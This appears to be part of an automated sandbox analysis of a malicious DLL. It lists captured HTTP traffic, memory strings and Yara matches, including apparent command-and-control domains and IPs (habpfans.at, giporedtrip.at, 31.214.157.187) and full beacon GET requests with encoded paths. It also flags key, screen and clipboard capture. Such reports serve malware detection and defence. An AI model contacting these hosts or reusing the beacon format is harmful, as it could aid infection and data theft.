Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Wed, 26 Jan 2022 16:04:33 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: close | Vary: Accept-Encoding | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Wed, 26 Jan 2022 16:04:54 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: keep-alive | Vary: Accept-Encoding | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194214.157.187/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/8
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
                      Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/
                      Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/g
                      Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp
                      Source: unknown DNS traffic detected: queries for: giporedtrip.at
                      Source: global traffic HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
                      Source: global traffic HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
                      Source: global traffic HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
                      Source: global traffic HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187
                      Source: global traffic HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
                      Source: global traffic HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
                      Source: global traffic HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
                      Source: global traffic HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
